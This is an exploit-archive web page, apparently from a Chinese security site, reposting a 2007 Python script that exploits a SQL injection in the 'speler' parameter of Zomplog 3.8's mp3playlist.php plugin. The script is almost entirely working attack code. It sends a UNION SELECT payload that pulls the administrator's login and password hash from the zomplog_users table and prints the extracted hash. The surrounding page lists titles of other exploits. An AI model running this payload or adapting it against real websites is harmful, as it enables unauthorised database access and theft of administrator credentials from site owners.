首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Zomplog <= 3.8 (mp3playlist.php speler) Remote SQL Injection Exploit
来源:neomorphs-[at]-gmail-[dot]-com 作者:NeoMorphS 发布时间:2007-05-21  
#!/usr/bin/python
#----------------------------------------------------------------------------------
# The sql injection : /zomplog-3.8/plugins/mp3playlist/mp3playlist.php?speler=[sql]
# I've code a sploit for the fun x)
#----------------------------------------------------------------------------------
# Zomplog website : http://zomplog.zomp.nl/
# Contact me : neomorphs-[at]-gmail-[dot]-com

import sys, urllib2

def usage():
print "+---------------------------------------------------+"
print "| Zomplog Remote SQL Injection <= 3.8 (mp3playlist) |"
print "+---------------------------------------------------+"
print "| Usage : zomplog.py [url + path]                   |"
print "| Exemple : zomplog.py http://localhost/zomplog neo |"
print "+---------------------------------------------------+"
print "|      By NeoMorphS - Thxs to Gu1ll4um3r0m41n       |"
print "|   Thxs too to #aerox(epiknet) #carib0u(worldnet)  |"
print "+---------------------------------------------------+"

def attack(url):
sql = "/plugins/mp3playlist/mp3playlist.php?speler=999999999%20UNION%20SELECT%200,0,0,CONCAT(login,%200x2D4840434B2D,%20password),0,0,0,0,0%20%20FROM%20zomplog_users%20WHERE%20id=1%20/*"
print "-> connect to website"
try: source = urllib2.urlopen(url+sql).read()
except: print "-> cannot connect to website"; sys.exit()
try: print "-> admin hash : "+source.split('-H@CK-')[1].split("'")[0]
except: print "-> cannot find the admin hash"

if (len(sys.argv) < 2):
usage()
else:
attack(sys.argv[1])

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Rational Software Hidden Admin
·LeadTools Raster Thumbnail Obj
·LeadTools Thumbnail Browser Co
·LeadTools JPEG 2000 COM Object
·MagicISO <= 5.4(build239) .cue
·Wordpress 2.1.3 admin-ajax.php
·FAQEngine <= 4.16.03 (question
·LeadTools Raster Variant (LTRV
·SimpNews <= 2.40.01 (print.php
·Microsoft IIS 6.0 (/AUX/.aspx)
·CA BrightStor Backup 11.5.2.0
·MS Windows Vista forged ARP pa
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved